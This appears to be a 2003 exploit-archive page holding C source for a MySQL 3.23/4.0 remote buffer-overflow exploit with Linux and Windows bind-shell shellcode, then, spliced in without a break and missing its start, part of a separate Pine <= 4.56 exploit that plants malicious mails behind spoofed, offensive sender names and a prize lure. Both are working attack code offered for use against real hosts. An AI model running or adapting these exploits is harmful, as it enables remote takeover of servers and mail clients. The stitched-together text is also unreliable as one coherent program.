/* exp for mysql ([get_salt_from_password] problem)
* proof of concept
* using jmp *eax for linux
* using jmp *edx for windows
* bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com) 2003/09/13
* Welcome to www cnhonker com
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password
LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root'
LIMIT 0,1"
#define FLUSHSQL
"\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\
x6C\x65\x67\x65\x73"
#define BUF 2048
#define VER "2.0b4"
MYSQL *conn;
char NOP[]="90";
char linux_shellcode[]=
"db31c03102b0c931"
"c08580cdc3893474"
"d231c03180cd07b0"
"40b0c03109b180cd"
"c031c38980cd25b0"
"80c2fe43f07203fa"
"14b0c031c38980cd"
"c931c03125b009b1"
"17b080cdc03180cd"
"89504050b0c931e3"
"b180cda283c889e0"
"d0f70ae831c78940"
"894c40c0525050e2"
"4c8d5157db310424"
"66b00ab3835980cd"
"057501f874493a80"
"31d2e209c38940c0"
"fb8980cd3fb003b1"
"4180cd496851f8e2"
"68732f6e622f2f68"
"51e389696c692d68"
"51e28970e1895352"
"c031d23180cd0bb0"
;
//bind on 53 port
char win_shellcode[]=
"4A5A10EBB966C9333480017DFAE2990A"
"EBE805EB70FFFFFF99999895A938FDC3"
"12999999E91295D9D912348512411291"
"ED12A5EA6A9AE1879AB9E7128DD71262"
"CECF74AA9AA612C8F36B12623F6AC097"
"C6C091EDDC9D5E1AC6C0707B125412C7"
"5A9ABDDF589A784812FF50AA85DF1291"
"78585A9A12589A9B125A9A991A6E1263"
"4912975F71C09AF39999991ECB945F1A"
"65CE66CFF34112C3ED71C09CC9999999"
"F3C9C9C9669BF398411275CE999B9E5E"
"59AAAC99F39DDE1066CACE8998F369CE"
"6DCE66CA66CAC9C9491261CE12DD751A"
"F359AA6D9D10C08910627B17CF10A1CF"
"D9CF10A5B5DF5EFFDE149898AACFC989"
"C8C8C850C8C898F3FAA5DE5E1499FDF4"
"C8C9A5DECB79CE66CA65CE66C965CE66"
"AA7DCE66591C3559CBC860EC4B66CACF"
"7B32C0C35A59AA7766677671EDFCDE66"
"FAF6EBC9EBFDFDD899EAEAFCF8FCEBDA"
"EBC9FCEDEAFCFAF6DC99D8EACDEDF0E1"
"F8FCEBF1F6D599FDF0D5FDF8EBF8EBFB"
"EE99D8E0AAC6ABEACACE99ABFAF6CAD8"
"D8EDFCF2F7F0FB99F0F599FDF7FCEDEA"
"FAFAF89999EDE9FCEAF6F5FAFAF6EAFC"
"99EDFCF2";
int win_port=53;
int type=1;
struct
{
char *os;
u_long ret;
int pad;
int systemtype; //0 is linux,1 is windows
} targets[] =
{
{ "linux:glibc-2.2.93-5", 0x42125b2b,19*4*2,0},
// { "windows2000 SP3 CN",0x77e625db,9*4*2,1},
{ "windows2000 SP4 CN",0x77e7bec3,9*4*2,1},
},v;
void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char
*dbname);
main(int argc,char **argv)
{
MYSQL_RES *result;
MYSQL_ROW row;
char jmpaddress[8];
char buffer[BUF],muser[20],buf2[1200];
my_ulonglong rslines;
struct sockaddr_in clisocket;
int i=0,j,clifd,count,a;
char data1,c;
fd_set fds;
char *server=NULL,*rootpass=NULL;
int pad,systemtype;
u_long jmpaddr;
if(argc<3) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
{
switch (c)
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'p':
rootpass=optarg;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || rootpass==NULL)
usage(argv[0]);
memset(muser,0,20);
memset(buf2,0,1200);
pad=targets[type-1].pad;
systemtype=targets[type-1].systemtype;
jmpaddr=targets[type-1].ret;
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(09/13)-%s
#\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com
@\n");
printf("---------------------------------------------------\n");
printf("[+] system type:%s,using ret
addr:%p,pad:%d\n",(systemtype==0)?"linux":
"windows",jmpaddr,pad);
printf("[+] Connecting to mysql server
%s:%d....",server,PORT);
fflush(stdout);
conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
if(conn==NULL) exit(0);
printf("ok\n");
printf("[+] ALTER user column...");
fflush(stdout);
if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
sqlerror("ALTER user table failed");
//select
printf("ok\n");
printf("[+] Select a valid user...");
fflush(stdout);
if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0)
sqlerror("select user from table failed");
result=mysql_store_result(conn);
if(result==NULL)
sqlerror("store result error");
rslines=mysql_num_rows(result);
if(rslines==0)
sqlerror("Cannot find a user");
row=mysql_fetch_row(result);
snprintf(muser,19,"%s",row[0]);
printf("ok\n");
printf("[+] Found a user:%s\n",muser);
memset(buffer,0,BUF);
i=sprintf(buffer,"update user set password='");
sprintf(jmpaddress,"%x",jmpaddr);
jmpaddress[8]=0;
for(j=0;j<pad-4;j+=2)
{
memcpy(buf2+j,NOP,2);
}
memcpy(buf2+j,"06eb",4);
memcpy(buf2+pad,jmpaddress,8);
switch(systemtype)
{
case 0:
memcpy(buf2+pad+8,linux_shellcode,strlen(linux_shellcode));
break;
case 1:
memcpy(buf2+pad+8,win_shellcode,strlen(win_shellcode));
break;
default:
printf("[-] Not support this systemtype\n");
mysql_close(conn);
exit(0);
}
j=strlen(buf2);
if(j%8)
{
j=j/8+1;
count=j*8-strlen(buf2);
memset(buf2+strlen(buf2),'A',count);
}
printf("[+] Password length:%d\n",strlen(buf2));
memcpy(buffer+i,buf2,strlen(buf2));
i+=strlen(buf2);
i+=sprintf(buffer+i,"' where user='%s'",muser);
mysql_free_result(result);
printf("[+] Modified password...");
fflush(stdout);
//get result
//write(2,buffer,i);
if(mysql_real_query(conn,buffer,i)!=0)
sqlerror("Modified password error");
//here I'll find client socket fd
printf("ok\n");
printf("[+] Finding client socket......");
j=sizeof(clisocket);
for(clifd=3;clifd<256;clifd++)
{
if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
if(clisocket.sin_port==htons(PORT)) break;
}
if(clifd==256)
{
printf("FAILED\n[-] Cannot find client socket\n");
mysql_close(conn);
exit(0);
}
printf("ok\n");
printf("[+] socketfd:%d\n",clifd);
//let server overflow
printf("[+] Overflow server....");
fflush(stdout);
send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
//if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0)
// sqlerror("Flush error");
printf("ok\n");
if(systemtype==0)
{
printf("[+] sending OOB.......");
fflush(stdout);
data1='I';
if(send(clifd,&data1,1,MSG_OOB)<1)
{
perror("error");
mysql_close(conn);
exit(0);
}
printf("ok\r\n");
}
printf("[+] Waiting for a shell.....\n");
if(systemtype==1)
{
clifd=socket(AF_INET,SOCK_STREAM,0);
client_connect(clifd,server,win_port);
}
//printf("[+] Waiting a shell.....");
fflush(stdout);
execsh(clifd);
mysql_close(conn);
exit(0);
}
int execsh(int clifd)
{
fd_set fds;
int count;
char buffer[BUF];
memset(buffer,0,BUF);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(clifd, &fds);
if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, BUF);
if (count <= 0) break;
if (write(clifd, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
if (FD_ISSET(clifd, &fds))
{
count = read(clifd, buffer, BUF);
if (count <= 0) break;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
}
}
void usage(char *s)
{
int a;
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(09/13)-%s
#\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com
@\n");
printf("---------------------------------------------------\n");
printf("Usage:%s -d <host> -p <root_pass> -t
<type>\n",s);
printf(" -d target host ip/name\n");
printf(" -p 'root' user paasword\n");
printf(" -t type [default:%d]\n",type);
printf(" ------------------------------\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret,
targets[a].os);
printf("\n");
exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char
*dbname)
{
MYSQL *connect;
connect=mysql_init(NULL);
if(connect==NULL)
{
printf("FAILED\n[-] init mysql
failed:%s\n",mysql_error(connect));
return NULL;
}
if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
{
printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
return NULL;
}
return connect;
}
void sqlerror(char *s)
{
fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
mysql_close(conn);
exit(0);
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}
bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d....",server,port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct
sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
return(-1);
}
printf("ok\r\n");
return(0);
}
/* binary specific */
base = getInt("ldd " PINE
" | grep \"libc\\.\" | awk '{print $4}' | tr -d
\"()\"");
// printf("GLIBC base addr 0x%.8x\n",base);
/* get libc path */
snprintf(libc,sizeof(libc),"%s",getShit("ldd " PINE
" | grep \"libc\\.\" | awk '{print $3}'"));
if(strlen(libc) <2) {
printf("can't get libc location\n");
exit(0);
}
libc[strlen(libc)-1] = 0;
/* lib specific */
snprintf(tmp,sizeof(tmp),"objdump -T %s | grep \\ system | "
"awk '{print $1}' ",libc);
offset = getInt(tmp);
// printf("GLIBC __libc_system offset 0x%.8x\n",offset);
offset += base;
// printf("system() addr 0x%.8x\n",offset);
return offset;
}
/* check if offset contains non usable chars */
int isUsable(int x) {
int i,j;
for(i = 0; i < sizeof(x); i++)
for(j =0; j < sizeof(nonusable); j++)
if( *(((unsigned char*)&x)+i) == nonusable[j])
return 0;
return 1;
}
/* get various system offsets */
int *getSystemOffsets() {
static int off[3];
int pid;
int x;
off[0] = getSystem();
off[1] = getInt("objdump -T "PINE" | grep system | awk
'{print $1}'");
off[2] = getInt("objdump -R "PINE" | grep system | awk
'{print $1}'");
pid = start_debug(0);
x = ptrace(PTRACE_PEEKTEXT,pid,off[2],NULL);
if(x == -1 && errno != 0)
die(1,"ptrace()");
off[2] = x;
stop_debug(pid);
return &off[0];
}
/* get target from local pine */
struct target_info getTarget() {
struct target_info target;
int *sysa;
int i;
char os[512];
/* get a description of target */
snprintf(os,sizeof(os),getShit("uname -sr | tr -d '\n'"));
snprintf(target.desc,sizeof(target.desc),"%s Pine %s",os,
getShit(PINE" -v | awk '{print $2}' | tr -d '\n'"));
printf("Trying to own: %s\n",target.desc);
pinerc();
/* find stack dist from params -> eip */
printf("Searching stack distance\n");
for(target.dist = 4; target.dist < 1024; target.dist+=4) {
prepare_mail("from","subj","to");
own_easy(target.dist,testsc);
write_mail("/tmp/meil");
printf("Testing target.dist %d\r",target.dist);
fflush(stdout);
if(test_dist())
break;
}
printf("\n");
if(target.dist == 1024)
die(1,"Can't find dist");
printf("DIST=%d\n\n",target.dist);
printf("Ok theoretically we can exploit it the easy way\n"
"looking for hard way shit now\n\n");
/* find our buffer on bss ebp should b eip-4 */
target.buff = findbuf(target.dist-4);
target.method = 0;
if(target.buff != -1) {
target.method = 1;
if(!isUsable(target.buff) || !isUsable(target.buff-PLIST))
die(0,"TODO: addr not usuable... trivial to fix");
printf("Our command will lie in 0x%.8x\n\n",target.buff);
/* find usable system() addr */
printf("Obtaining system() addr list\n");
sysa = getSystemOffsets();
for(i = 0; i < 3; i++) {
int usable = isUsable(sysa[i]);
printf("System %d:0x%.8x %s\n",i,sysa[i],
usable?"OK":"NOT OK");
if(usable)
target.sys = sysa[i];
}
printf("Will use 0x%.8x\n\n",target.sys);
}
else
printf("Unable to do things the hard way =(\n");
unlink("/tmp/pinerc");
unlink("/tmp/meil");
printf("Summary of targets for this system:\n"
"{ \"%s\",0,%d,0,0},\n",target.desc,target.dist);
if(target.method)
printf("{ \"%s\",1,%d,0x%.8x,0x%.8x}\n",
target.desc,target.dist-4,target.buff,target.sys);
return target;
}
/* yeah kids luv this */
void skriptkiddie_s0lar() {
char *mbox;
FILE *f;
struct target_info target;
printf("O shit... is it s0lar running this exp again?\n"
"not even a -h? ok lets make her happy and make everyhing magically
work\n"
"WARNING: need write axx on /tmp and use of gdb (no grsec
high)\n\n");
target = getTarget();
mbox = (char*)getenv("MAIL");
if(!mbox)
die(0,"getenv()");
printf("Attempting to write mails to %s\n",mbox);
f = fopen(mbox,"a");
if(!f)
die(1,"fopen()");
/* first mail (easy) */
prepare_mail("Andrei Koymaski <andrei gay ru>",
"Easy method portbind 6682","Gustavo Lamazza <gustavo
gay it>");
own_easy(target.dist,shellcode);
if(fprintf(f,"From sorbo Tue Nov 29 00:00:00
1983\n%s\n",mail)<1)
die(1,"fprintf()");
/* second mail (hard)
* we run vi and then
* :!/bin/sh
* cuz we don't have enough space to make a bindshell and shit
*/
if(target.method) {
prepare_mail("Osama Bin Laden <osama al-quaeda ar>",
"Hard method (owns grsec) portbind 6682 with vi... spawn shell from
vi",
"George Bush <george whitehouse gov>");
own_hard(target.sys,target.buff-PLIST,target.buff,
target.dist-4,
lame_cmd);
if(fprintf(f,"From sorbo Tue Nov 29 00:00:00
1983\n%s\n",mail)<1)
die(1,"fprintf()");
}
printf("You should have mail... read with pine and see if
this"
" crap worx\n");
printf("Enjoy.... s0lar ti amo\n");
exit(0);
}
void listTargets() {
int i;
printf( "Id\tDescription\tMethod\tDist\tBuff\t\tsystem()\n"
"=======================================================\n");
for(i =0; i < sizeof(targets)/sizeof(struct target_info); i++) {
printf("%d\t%s\t%s\t%d\t0x%.8x\t0x%.8x\n",
i,targets[i].desc,targets[i].method?"hard":"easy",
targets[i].dist,targets[i].buff,targets[i].sys);
}
}
/* own a target */
void own(struct target_info t,char *from,char *sub,char *to) {
prepare_mail(from,sub,to);
/* hard */
switch(t.method) {
case 1:
own_hard(t.sys,t.buff-PLIST,t.buff,t.dist,lame_cmd);
break;
case 0:
own_easy(t.dist,shellcode);
break;
default:
die(0,"Unknown ownage method");
}
printf("%s",mail);
}
void usage(char *m) {
printf("Usage: %s <opts>\n"
"-h\tthis lame message\n"
"-f\tfrom\n"
"-t\tto\n"
"-s\tsub\n"
"-o\ttarget\n"
"-m\tmethod 0:easy 1:hard(grsex)\n"
"-d\tdist\n"
"-b\tbuff\n"
"-l\tsystem\n\n"
,m);
listTargets();
}
int main(int argc, char *argv[]) {
char from[512];
char to[512];
char sub[512];
int opt;
struct target_info t;
struct target_info *target = &t; /* we shall own this */
strcpy(from,"Justin Time <admin playboy com>");
strcpy(to,"You <winners playboy com>");
strcpy(sub,"You are selected! Come get your FREE playboy.com
account");
t.method = -1;
t.buff = 0;
t.sys = 0;
t.dist = 0;
fprintf(stderr,"(remote?) Pine <= 4.56 exploit "
"by sorbo (sorbox yahoo com)\np s grsec won't save you
=(\n\n");
if(argc<2)
skriptkiddie_s0lar();
while( (opt = getopt(argc,argv,"hf:t:s:o:m:d:b:l:")) != -1) {
switch(opt) {
default:
case 'h':
usage(argv[0]);
exit(0);
case 'm':
t.method = atoi(optarg);
break;
case 'd':
t.dist = atoi(optarg);
break;
case 'b':
if(sscanf(optarg,"%x",&t.buff) != 1)
die(0,"Can't parse buff addr");
break;
case 'l':
if(sscanf(optarg,"%x",&t.sys) != 1)
die(0,"Can't parse sys addr");
break;
case 'f':
/* does snprintf put the 0 at end if arg
* barely fits ? i never really looked into
* this... hope it does! ;D
*/
snprintf(from,sizeof(from),"%s",optarg);
break;
case 't':
snprintf(to,sizeof(to),"%s",optarg);
break;
case 's':
snprintf(sub,sizeof(sub),"%s",optarg);
break;
case 'o': {
unsigned int o = atoi(optarg);
if(o >=
sizeof(targets)/sizeof(struct target_info))
die(0,"Target outta range");
target = &targets[o];
break;
}
}
}
/* check if we got all we need */
if(target == &t) {
if(!t.dist)
die(0,"provide dist");
if(t.method == 1)
if(!t.buff || !t.sys)
die(0,"buff or sys not provided");
}
/* go for it */
own(*target,from,sub,to);
exit(0);
}
securitydot.net - 2003-09-14
|
